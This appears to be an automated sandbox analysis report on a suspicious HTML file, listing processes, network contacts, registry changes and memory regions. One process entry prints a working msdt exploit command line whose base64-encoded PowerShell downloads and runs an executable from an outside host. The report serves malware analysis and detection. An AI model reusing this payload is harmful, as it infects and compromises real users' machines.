Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
|
||
C:\Windows\System32\msdt.exe
|
"C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBzUCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNMRWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1
|
172.217.168.78
|
||
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
|
216.58.215.237
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
accounts.google.com
|
216.58.215.237
|
||
www.google.com
|
172.217.168.36
|
||
clients.l.google.com
|
172.217.168.78
|
||
clients2.google.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.1
|
unknown
|
unknown
|
||
216.58.215.237
|
accounts.google.com
|
United States
|
||
192.168.2.4
|
unknown
|
unknown
|
||
192.168.2.5
|
unknown
|
unknown
|
||
172.217.168.78
|
clients.l.google.com
|
United States
|
||
172.217.168.36
|
www.google.com
|
United States
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
192.168.2.23
|
unknown
|
unknown
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
ahfgeienlihckogmohjhadlkjgocpleb
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\msdt.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gdaefkejpgkiemlaofpalmlakkmbjdnl
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.cdm.origin_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blocklist_cache_md5_digest
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
There are 44 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
23881B59000
|
heap
|
page read and write
|
||
23881AC4000
|
heap
|
page read and write
|
||
23881B50000
|
heap
|
page read and write
|
||
880D7F000
|
stack
|
page read and write
|
||
1FC7CFAD000
|
heap
|
page read and write
|
||
1DF6AAF0000
|
trusted library allocation
|
page read and write
|
||
1DF6AD13000
|
heap
|
page read and write
|
||
23881C01000
|
heap
|
page read and write
|
||
1FC7C6E3000
|
heap
|
page read and write
|
||
1FDF9264000
|
heap
|
page read and write
|
||
19F53550000
|
remote allocation
|
page read and write
|
||
1FD8B650000
|
heap
|
page read and write
|
||
1DDD05A0000
|
heap
|
page read and write
|
||
224E47C4000
|
heap
|
page read and write
|
||
1DF65440000
|
heap
|
page read and write
|
||
1FD8B913000
|
heap
|
page read and write
|
||
1DDD0728000
|
heap
|
page read and write
|
||
1FDF9240000
|
heap
|
page read and write
|
||
1DF65475000
|
heap
|
page read and write
|
||
1DF66480000
|
trusted library section
|
page readonly
|
||
1DF6ACFF000
|
heap
|
page read and write
|
||
23503C02000
|
trusted library allocation
|
page read and write
|
||
23503502000
|
heap
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
57302FF000
|
stack
|
page read and write
|
||
1FDF90B0000
|
heap
|
page read and write
|
||
1992F250000
|
heap
|
page read and write
|
||
23881C28000
|
heap
|
page read and write
|
||
1FD8B7C0000
|
trusted library allocation
|
page read and write
|
||
1DF65492000
|
heap
|
page read and write
|
||
1DF6546F000
|
heap
|
page read and write
|
||
1FC7C3E0000
|
heap
|
page read and write
|
||
1FC7CF88000
|
heap
|
page read and write
|
||
1DF6A820000
|
trusted library allocation
|
page read and write
|
||
1DDD0460000
|
heap
|
page read and write
|
||
1DF65413000
|
heap
|
page read and write
|
||
23503449000
|
heap
|
page read and write
|
||
23881AC0000
|
heap
|
page read and write
|
||
1FC7CFCC000
|
heap
|
page read and write
|
||
19F52E29000
|
heap
|
page read and write
|
||
1DF6AAE0000
|
trusted library allocation
|
page read and write
|
||
207A7FD000
|
stack
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1992F3B0000
|
trusted library allocation
|
page read and write
|
||
8808FE000
|
stack
|
page read and write
|
||
24EC2FB000
|
stack
|
page read and write
|
||
6D0636B000
|
stack
|
page read and write
|
||
1DF6A98E000
|
trusted library allocation
|
page read and write
|
||
1DF6ACF9000
|
heap
|
page read and write
|
||
224E47B2000
|
heap
|
page read and write
|
||
1DF6AE60000
|
trusted library allocation
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
224E3DC0000
|
trusted library allocation
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
1DF6A980000
|
trusted library allocation
|
page read and write
|
||
1FC7CF86000
|
heap
|
page read and write
|
||
8804FE000
|
stack
|
page read and write
|
||
1DF6ACFB000
|
heap
|
page read and write
|
||
1DF6ACEF000
|
heap
|
page read and write
|
||
64AF77F000
|
stack
|
page read and write
|
||
1FC7C668000
|
heap
|
page read and write
|
||
1DDD071F000
|
heap
|
page read and write
|
||
1FC7CFA4000
|
heap
|
page read and write
|
||
1DE06A40000
|
heap
|
page read and write
|
||
1FC7D400000
|
heap
|
page read and write
|
||
1DF65526000
|
heap
|
page read and write
|
||
23881C3C000
|
heap
|
page read and write
|
||
3916C7A000
|
unkown
|
page read and write
|
||
1FD8B86E000
|
heap
|
page read and write
|
||
1DF65A80000
|
trusted library allocation
|
page read and write
|
||
1DF66100000
|
trusted library allocation
|
page read and write
|
||
2A0648C0000
|
heap
|
page read and write
|
||
1FDF9257000
|
heap
|
page read and write
|
||
1FC7CFA1000
|
heap
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
23883460000
|
heap
|
page read and write
|
||
23503454000
|
heap
|
page read and write
|
||
391697E000
|
stack
|
page read and write
|
||
1FC7C66A000
|
heap
|
page read and write
|
||
224E3DA0000
|
trusted library allocation
|
page read and write
|
||
23881B97000
|
heap
|
page read and write
|
||
5730579000
|
stack
|
page read and write
|
||
1DDD070F000
|
heap
|
page read and write
|
||
1FC7C690000
|
heap
|
page read and write
|
||
1DF6AD13000
|
heap
|
page read and write
|
||
1DF6A9B0000
|
trusted library allocation
|
page read and write
|
||
C58E7FF000
|
stack
|
page read and write
|
||
1DF65D18000
|
heap
|
page read and write
|
||
1992F429000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
84FC97E000
|
stack
|
page read and write
|
||
BE3A4FF000
|
stack
|
page read and write
|
||
2A064A13000
|
heap
|
page read and write
|
||
207A8F8000
|
stack
|
page read and write
|
||
1DDD1430000
|
trusted library allocation
|
page read and write
|
||
1DF6549C000
|
heap
|
page read and write
|
||
1DF6AD09000
|
heap
|
page read and write
|
||
21CDD410000
|
heap
|
page read and write
|
||
1DF66260000
|
trusted library allocation
|
page read and write
|
||
1DF6AD0F000
|
heap
|
page read and write
|
||
1FC7C65C000
|
heap
|
page read and write
|
||
1DF66470000
|
trusted library section
|
page readonly
|
||
1DF6A98C000
|
trusted library allocation
|
page read and write
|
||
1FC7C708000
|
heap
|
page read and write
|
||
21CDD613000
|
heap
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
1FDF9229000
|
heap
|
page read and write
|
||
1FC7C66D000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1FC7CF7D000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
64AEF7A000
|
stack
|
page read and write
|
||
19F52E02000
|
heap
|
page read and write
|
||
224E4700000
|
heap
|
page read and write
|
||
24EC0FF000
|
stack
|
page read and write
|
||
224E3E65000
|
heap
|
page read and write
|
||
1DDD0706000
|
heap
|
page read and write
|
||
8806FB000
|
stack
|
page read and write
|
||
944727E000
|
stack
|
page read and write
|
||
1DF6AD1D000
|
heap
|
page read and write
|
||
23503513000
|
heap
|
page read and write
|
||
224E3E68000
|
heap
|
page read and write
|
||
1FC7CF82000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1DF65513000
|
heap
|
page read and write
|
||
BBB6C7E000
|
stack
|
page read and write
|
||
880B7E000
|
stack
|
page read and write
|
||
57304FF000
|
stack
|
page read and write
|
||
23881C02000
|
heap
|
page read and write
|
||
1FC7CF16000
|
heap
|
page read and write
|
||
84FC8FE000
|
stack
|
page read and write
|
||
1FC7C3F0000
|
heap
|
page read and write
|
||
1FDF923D000
|
heap
|
page read and write
|
||
1DF6A980000
|
trusted library allocation
|
page read and write
|
||
1FC7CF14000
|
heap
|
page read and write
|
||
1992F48A000
|
heap
|
page read and write
|
||
2079D0E000
|
stack
|
page read and write
|
||
1DF652B0000
|
heap
|
page read and write
|
||
21CDD67D000
|
heap
|
page read and write
|
||
BE3A5FF000
|
stack
|
page read and write
|
||
1FDF9202000
|
heap
|
page read and write
|
||
23503260000
|
heap
|
page read and write
|
||
1FDF9120000
|
heap
|
page read and write
|
||
84FC87E000
|
stack
|
page read and write
|
||
84FC9FE000
|
stack
|
page read and write
|
||
1DF65400000
|
heap
|
page read and write
|
||
9446FAE000
|
stack
|
page read and write
|
||
21CDD64B000
|
heap
|
page read and write
|
||
1DDD05C0000
|
heap
|
page read and write
|
||
1DF6AD05000
|
heap
|
page read and write
|
||
6D06A7D000
|
stack
|
page read and write
|
||
1FDF9242000
|
heap
|
page read and write
|
||
BBB695B000
|
stack
|
page read and write
|
||
1FC7C550000
|
trusted library allocation
|
page read and write
|
||
2350347D000
|
heap
|
page read and write
|
||
1DF6AD2B000
|
heap
|
page read and write
|
||
64AF37D000
|
stack
|
page read and write
|
||
1DDD0600000
|
heap
|
page read and write
|
||
6D067FE000
|
stack
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1DE068E0000
|
heap
|
page read and write
|
||
21CDD68A000
|
heap
|
page read and write
|
||
573027F000
|
stack
|
page read and write
|
||
6D06AFE000
|
stack
|
page read and write
|
||
1992F4CE000
|
heap
|
page read and write
|
||
1FC7CF61000
|
heap
|
page read and write
|
||
2A064A3C000
|
heap
|
page read and write
|
||
1FC7C6C5000
|
heap
|
page read and write
|
||
1DF6AD2E000
|
heap
|
page read and write
|
||
23881BF9000
|
heap
|
page read and write
|
||
1FD8B6C0000
|
heap
|
page read and write
|
||
224E3E24000
|
heap
|
page read and write
|
||
1DF6AAB0000
|
trusted library allocation
|
page read and write
|
||
1DF6A9C0000
|
trusted library allocation
|
page read and write
|
||
1DF6AC56000
|
heap
|
page read and write
|
||
1DE06726000
|
heap
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
1FD8B868000
|
heap
|
page read and write
|
||
1DDD13C0000
|
heap
|
page readonly
|
||
1DF6AD05000
|
heap
|
page read and write
|
||
1DF6A987000
|
trusted library allocation
|
page read and write
|
||
1FC7C63C000
|
heap
|
page read and write
|
||
23881B85000
|
heap
|
page read and write
|
||
3916AFC000
|
stack
|
page read and write
|
||
1FC7C65F000
|
heap
|
page read and write
|
||
94474FE000
|
stack
|
page read and write
|
||
1DF6AC49000
|
heap
|
page read and write
|
||
23883A10000
|
heap
|
page read and write
|
||
1FC7CF1D000
|
heap
|
page read and write
|
||
1FC7CFC8000
|
heap
|
page read and write
|
||
21CDD64D000
|
heap
|
page read and write
|
||
1FD8B878000
|
heap
|
page read and write
|
||
BE3A1F9000
|
stack
|
page read and write
|
||
3916B7F000
|
stack
|
page read and write
|
||
1FC7CFCF000
|
heap
|
page read and write
|
||
1FD8B841000
|
heap
|
page read and write
|
||
224E4802000
|
heap
|
page read and write
|
||
1FC7CFA1000
|
heap
|
page read and write
|
||
88097C000
|
stack
|
page read and write
|
||
24EBD9B000
|
stack
|
page read and write
|
||
1DF6AD32000
|
heap
|
page read and write
|
||
1DDD0605000
|
heap
|
page read and write
|
||
24EC07F000
|
stack
|
page read and write
|
||
1FC7C660000
|
heap
|
page read and write
|
||
1DF6AD06000
|
heap
|
page read and write
|
||
1FC7CF94000
|
heap
|
page read and write
|
||
1DF6ACFF000
|
heap
|
page read and write
|
||
2350344F000
|
heap
|
page read and write
|
||
1DE0674C000
|
heap
|
page read and write
|
||
1FC7CF81000
|
heap
|
page read and write
|
||
224E3E75000
|
heap
|
page read and write
|
||
224E3E56000
|
heap
|
page read and write
|
||
1FC7CF50000
|
heap
|
page read and write
|
||
235031F0000
|
heap
|
page read and write
|
||
1FC7C664000
|
heap
|
page read and write
|
||
1DF6AD00000
|
heap
|
page read and write
|
||
1DDD070B000
|
heap
|
page read and write
|
||
23881BED000
|
heap
|
page read and write
|
||
23881BF9000
|
heap
|
page read and write
|
||
1DF66430000
|
trusted library section
|
page readonly
|
||
1992FD00000
|
heap
|
page read and write
|
||
39168FF000
|
stack
|
page read and write
|
||
1FC7CF9A000
|
heap
|
page read and write
|
||
1DF65424000
|
heap
|
page read and write
|
||
1DF6AD09000
|
heap
|
page read and write
|
||
1DF6AD24000
|
heap
|
page read and write
|
||
3916CFE000
|
stack
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
BBB707E000
|
stack
|
page read and write
|
||
23503455000
|
heap
|
page read and write
|
||
21CDD647000
|
heap
|
page read and write
|
||
1DDD0470000
|
trusted library allocation
|
page read and write
|
||
1FD8C002000
|
trusted library allocation
|
page read and write
|
||
1FC7CF8B000
|
heap
|
page read and write
|
||
224E3D70000
|
heap
|
page read and write
|
||
2A064B02000
|
heap
|
page read and write
|
||
1FDF9262000
|
heap
|
page read and write
|
||
1DF6ACDE000
|
heap
|
page read and write
|
||
21CDD702000
|
heap
|
page read and write
|
||
94476FF000
|
stack
|
page read and write
|
||
1DDD13B0000
|
trusted library allocation
|
page read and write
|
||
BE3A57E000
|
stack
|
page read and write
|
||
1DDD1170000
|
trusted library allocation
|
page read and write
|
||
1FC7CFAB000
|
heap
|
page read and write
|
||
1DF65D59000
|
heap
|
page read and write
|
||
1992F513000
|
heap
|
page read and write
|
||
1FC7CF82000
|
heap
|
page read and write
|
||
1DF6B000000
|
heap
|
page read and write
|
||
2A064A44000
|
heap
|
page read and write
|
||
1992F413000
|
heap
|
page read and write
|
||
88008C000
|
stack
|
page read and write
|
||
21CDD5E0000
|
trusted library allocation
|
page read and write
|
||
6D0697E000
|
stack
|
page read and write
|
||
1FDF9266000
|
heap
|
page read and write
|
||
2A064870000
|
heap
|
page read and write
|
||
23883500000
|
heap
|
page read and write
|
||
1DF66460000
|
trusted library section
|
page readonly
|
||
1FC7CF7D000
|
heap
|
page read and write
|
||
1DF6AA90000
|
trusted library allocation
|
page read and write
|
||
19F52DC0000
|
heap
|
page read and write
|
||
2A064A36000
|
heap
|
page read and write
|
||
224E4823000
|
heap
|
page read and write
|
||
1DDD070A000
|
heap
|
page read and write
|
||
19F53550000
|
remote allocation
|
page read and write
|
||
224E4743000
|
heap
|
page read and write
|
||
224E3F13000
|
heap
|
page read and write
|
||
64AEB1B000
|
stack
|
page read and write
|
||
1DF65D9C000
|
heap
|
page read and write
|
||
23881BF1000
|
heap
|
page read and write
|
||
1DDD071F000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1FC7C600000
|
heap
|
page read and write
|
||
21CDD708000
|
heap
|
page read and write
|
||
21CDD68E000
|
heap
|
page read and write
|
||
2A065202000
|
trusted library allocation
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
207A6FC000
|
stack
|
page read and write
|
||
224E3FE5000
|
heap
|
page read and write
|
||
1DF65429000
|
heap
|
page read and write
|
||
1DF6AE00000
|
trusted library allocation
|
page read and write
|
||
1DF6AD25000
|
heap
|
page read and write
|
||
1FDF9276000
|
heap
|
page read and write
|
||
1DDD0728000
|
heap
|
page read and write
|
||
880C7A000
|
stack
|
page read and write
|
||
1DF6AAD0000
|
trusted library allocation
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1FC7C6BE000
|
heap
|
page read and write
|
||
1DF6AD1C000
|
heap
|
page read and write
|
||
1FC7C713000
|
heap
|
page read and write
|
||
1DF6AD02000
|
heap
|
page read and write
|
||
1DF6AAC0000
|
trusted library allocation
|
page read and write
|
||
1FDF9302000
|
heap
|
page read and write
|
||
1DF6AD0F000
|
heap
|
page read and write
|
||
1FDF9269000
|
heap
|
page read and write
|
||
1DF6A9C0000
|
trusted library allocation
|
page read and write
|
||
1FDF925F000
|
heap
|
page read and write
|
||
23881BFA000
|
heap
|
page read and write
|
||
1FC7C6A6000
|
heap
|
page read and write
|
||
224E3E92000
|
heap
|
page read and write
|
||
1FDF9232000
|
heap
|
page read and write
|
||
1DF65D13000
|
heap
|
page read and write
|
||
1DE06690000
|
heap
|
page read and write
|
||
1992F4E1000
|
heap
|
page read and write
|
||
1DF6ACFB000
|
heap
|
page read and write
|
||
224E3F8E000
|
heap
|
page read and write
|
||
1DF65D00000
|
heap
|
page read and write
|
||
1FC7D420000
|
heap
|
page read and write
|
||
1992F46F000
|
heap
|
page read and write
|
||
1FD8B889000
|
heap
|
page read and write
|
||
1DE06737000
|
heap
|
page read and write
|
||
23503452000
|
heap
|
page read and write
|
||
1FC7CFA1000
|
heap
|
page read and write
|
||
23503500000
|
heap
|
page read and write
|
||
23503508000
|
heap
|
page read and write
|
||
1FC7CF00000
|
heap
|
page read and write
|
||
1FDF9261000
|
heap
|
page read and write
|
||
64AF57F000
|
stack
|
page read and write
|
||
1DF66450000
|
trusted library section
|
page readonly
|
||
21CDD700000
|
heap
|
page read and write
|
||
BE3A17B000
|
stack
|
page read and write
|
||
573037C000
|
stack
|
page read and write
|
||
23503451000
|
heap
|
page read and write
|
||
1FC7CF7E000
|
heap
|
page read and write
|
||
39169FF000
|
stack
|
page read and write
|
||
21CDD64C000
|
heap
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
2350344B000
|
heap
|
page read and write
|
||
1FC7CFAA000
|
heap
|
page read and write
|
||
1DF65D9C000
|
heap
|
page read and write
|
||
1DF6AAE0000
|
remote allocation
|
page read and write
|
||
39165FF000
|
stack
|
page read and write
|
||
1DF6AC12000
|
heap
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
1FC7CF70000
|
heap
|
page read and write
|
||
1DF6ACFB000
|
heap
|
page read and write
|
||
1DDD06C0000
|
heap
|
page read and write
|
||
1FC7C629000
|
heap
|
page read and write
|
||
1FD8B660000
|
heap
|
page read and write
|
||
94475FE000
|
stack
|
page read and write
|
||
1FD8B857000
|
heap
|
page read and write
|
||
64AF67E000
|
stack
|
page read and write
|
||
224E3E13000
|
heap
|
page read and write
|
||
1DF65457000
|
heap
|
page read and write
|
||
C58EBFF000
|
stack
|
page read and write
|
||
1FC7D402000
|
heap
|
page read and write
|
||
64AF17C000
|
stack
|
page read and write
|
||
224E3E8B000
|
heap
|
page read and write
|
||
1992F43E000
|
heap
|
page read and write
|
||
19F52E00000
|
heap
|
page read and write
|
||
39166FB000
|
stack
|
page read and write
|
||
1DF6ACFF000
|
heap
|
page read and write
|
||
1DF65D9C000
|
heap
|
page read and write
|
||
1DF65479000
|
heap
|
page read and write
|
||
9446F2B000
|
stack
|
page read and write
|
||
1DF6AC63000
|
heap
|
page read and write
|
||
1FDF925C000
|
heap
|
page read and write
|
||
1DDD13D0000
|
trusted library allocation
|
page read and write
|
||
23881AA0000
|
heap
|
page read and write
|
||
1DF6ACF9000
|
heap
|
page read and write
|
||
21CDD629000
|
heap
|
page read and write
|
||
1DF6A9A0000
|
trusted library allocation
|
page read and write
|
||
19F53602000
|
trusted library allocation
|
page read and write
|
||
1FD8B813000
|
heap
|
page read and write
|
||
23881C3C000
|
heap
|
page read and write
|
||
1DF6AD19000
|
heap
|
page read and write
|
||
1FDF927A000
|
heap
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
19F52D50000
|
heap
|
page read and write
|
||
1FC7CFA5000
|
heap
|
page read and write
|
||
238867F0000
|
trusted library allocation
|
page read and write
|
||
21CDD63C000
|
heap
|
page read and write
|
||
224E4602000
|
heap
|
page read and write
|
||
21CDD3A0000
|
heap
|
page read and write
|
||
23503360000
|
trusted library allocation
|
page read and write
|
||
19F52E20000
|
heap
|
page read and write
|
||
224E3E43000
|
heap
|
page read and write
|
||
2079C8B000
|
stack
|
page read and write
|
||
1DF6AD30000
|
heap
|
page read and write
|
||
1DF6AD05000
|
heap
|
page read and write
|
||
39163FA000
|
stack
|
page read and write
|
||
23881ACE000
|
heap
|
page read and write
|
||
1DF6AD31000
|
heap
|
page read and write
|
||
9F87379000
|
stack
|
page read and write
|
||
1DDD070D000
|
heap
|
page read and write
|
||
21CDD64F000
|
heap
|
page read and write
|
||
23881BF6000
|
heap
|
page read and write
|
||
1DE0674D000
|
heap
|
page read and write
|
||
1DF6A860000
|
trusted library allocation
|
page read and write
|
||
1DF667D1000
|
trusted library allocation
|
page read and write
|
||
21CDD627000
|
heap
|
page read and write
|
||
23883A11000
|
heap
|
page read and write
|
||
224E4792000
|
heap
|
page read and write
|
||
1992F2B0000
|
heap
|
page read and write
|
||
1FDF9259000
|
heap
|
page read and write
|
||
1FDF924E000
|
heap
|
page read and write
|
||
